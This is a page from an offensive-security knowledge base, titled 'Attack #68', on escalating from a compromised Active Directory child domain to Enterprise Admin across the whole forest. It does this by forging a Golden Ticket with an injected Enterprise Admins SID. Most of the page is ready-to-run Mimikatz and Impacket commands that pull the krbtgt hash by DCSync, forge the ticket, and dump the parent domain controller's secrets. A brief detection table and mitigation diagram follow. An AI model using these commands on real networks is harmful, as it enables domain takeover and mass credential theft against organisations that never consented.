attack-68-cross-domain-trust-abuse-sid-history.md (3959B)
1 --- 2 title: "Attack #68 โ Cross-Domain Trust Abuse (SID History)" 3 description: "In AD forests with multiple domains connected by trust relationships, compromising one child domain gives a path to the forest root domain. By forging aโฆ" 4 category: active-directory 5 subcategory: "Trust Abuse" 6 tags: ["active-directory", "kerberos", "credential-access", "privilege-escalation", "hashing"] 7 tools: ["Impacket", "Mimikatz", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Nine/๐ถ Attack #68 โ Cross-Domain Trust Abuse (SID History).md" 11 --- 12 # ๐ถ Attack #68 โ Cross-Domain Trust Abuse (SID History) 13 14 *** 15 16 ## ๐ How It Works 17 18 In AD forests with multiple domains connected by **trust relationships**, compromising one child domain gives a path to the forest root domain. By forging a Golden Ticket in the child domain and injecting the **Enterprise Admins SID** from the parent domain into the ticket's `sIDHistory` field (via the `ExtraSids` PAC field), the attacker gains Enterprise Admin privileges across the entire forest. 19 20 This works because **parent-child trust is bidirectional and transitive by default**, and SID filtering is **NOT** enforced on inter-domain trusts within the same forest. 21 22 *** 23 24 ## โ๏ธ Prerequisites 25 26 | Requirement | Detail | 27 |---|---| 28 | **KRBTGT hash of child domain** | Obtained via DCSync in child domain | 29 | **Child domain SID** | Domain SID of compromised child | 30 | **Enterprise Admins SID** | Typically the forest root domain SID + `-519` | 31 32 *** 33 34 ## ๐ป Full Commands 35 36 ```powershell 37 # โโ Get child domain KRBTGT hash โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 38 mimikatz.exe "lsadump::dcsync /domain:child.corp.local /user:krbtgt" exit 39 40 # โโ Get parent domain SID โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 41 Get-ADDomain -Identity corp.local | Select DomainSID 42 # S-1-5-21-<parent_SID> 43 # Enterprise Admins = S-1-5-21-<parent_SID>-519 44 45 # โโ Forge Golden Ticket with parent EA SID โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 46 kerberos::golden /user:Administrator /domain:child.corp.local \ 47 /sid:S-1-5-21-<child_SID> /krbtgt:<child_krbtgt_hash> \ 48 /sids:S-1-5-21-<parent_SID>-519 /ptt 49 # The /sids parameter injects Enterprise Admins SID into ExtraSids PAC field 50 51 # โโ Access parent domain as Enterprise Admin โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 52 dir \\PARENT-DC.corp.local\C$ 53 lsadump::dcsync /domain:corp.local /user:krbtgt 54 ``` 55 56 ```bash 57 # โโ Impacket โ forge ticket with extra SID โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 58 ticketer.py -nthash <child_krbtgt_hash> \ 59 -domain-sid S-1-5-21-<child_SID> \ 60 -domain child.corp.local \ 61 -extra-sid S-1-5-21-<parent_SID>-519 \ 62 Administrator 63 64 export KRB5CCNAME=Administrator.ccache 65 secretsdump.py -k -no-pass corp.local/Administrator@PARENT-DC.corp.local 66 ``` 67 68 *** 69 70 ## ๐ก๏ธ Detection โ Event IDs 71 72 | Event ID | Source | What to Look For | 73 |---|---|---| 74 | **4769** | Security Log (DC) | TGS request from child domain for parent domain resources | 75 | **4624** | Security Log | Logon with Enterprise Admin SID in token but no EA group membership | 76 77 *** 78 79 ## ๐ Attack Chain Context 80 81 ``` 82 [Cross-Domain Trust] โโโ Child Domain โ Enterprise Admin in entire forest 83 โ 84 โโโโ ๐ Golden Ticket /sids = ExtraSids SID injection 85 โโโโ โ ๏ธ SID filtering NOT enforced within forest trusts 86 โโโโ ๐ Defeated by: SID filtering on external trusts, selective auth 87 ``` 88 89 *** 90 91 > โ **Attack #68 โ Cross-Domain Trust Abuse complete.**